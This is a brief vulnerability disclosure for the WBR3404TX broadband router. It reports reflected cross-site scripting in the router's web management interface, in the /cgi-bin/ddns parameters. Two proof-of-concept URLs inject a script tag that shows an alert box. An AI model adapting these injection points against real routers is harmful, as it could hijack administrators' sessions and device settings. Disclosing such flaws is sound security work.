The WBR3404TX broadband router suffers from a cross site scripting vulnerability in the web based management interface.
a3bdc43059b6289242ec22e3ed84d6d3017c230a024c7643b299663d377ae62c
I.Overview
Current firmware version is R1.94p0vTIG (*the latest).
WBR3404TX Broadband Router Web Management
II.Description
http://[routeraddress]/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=%22%3E%3Cscript%3Ealert('xss%20detected!');%3C/script%3E%3Ctext%20id=%22&DU=&DW=
http://[routeraddress]/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=&DU=%22%3E%3Cscript%3Ealert('xss%20detected!');%3C/script%3E%3Ctext%20id=%22&DW=
Open to XSS atacks via the web management panel.